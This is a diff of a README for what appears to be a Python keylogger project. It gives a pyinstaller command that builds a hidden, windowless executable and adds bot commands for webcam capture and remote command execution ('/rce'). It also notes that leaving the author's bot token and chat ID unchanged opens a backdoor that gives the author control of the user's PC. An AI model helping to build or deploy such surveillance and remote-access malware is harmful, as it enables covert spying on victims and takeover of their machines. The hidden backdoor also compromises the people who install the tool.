vux06/Advanced-Keylogger/README.md

 ```bash
 pyinstaller --onefile --noconsole --icon=myicon.ico your_script.pyw
 ```

+## Custom Commands
+- **/camera**: To receive a capture from the Webcam.
+- **/rce <COMMAND>**: To execute a system command.

-## NOTE: Usage of the code without changing the Bot Token and Chat ID will lead to a BackDoor which reaches me.
+# NOTE: Usage of the code without changing the Bot Token and Chat ID will lead to a BackDoor which reaches me.
 Which means I am in control of your PC.
 Happy Hacking...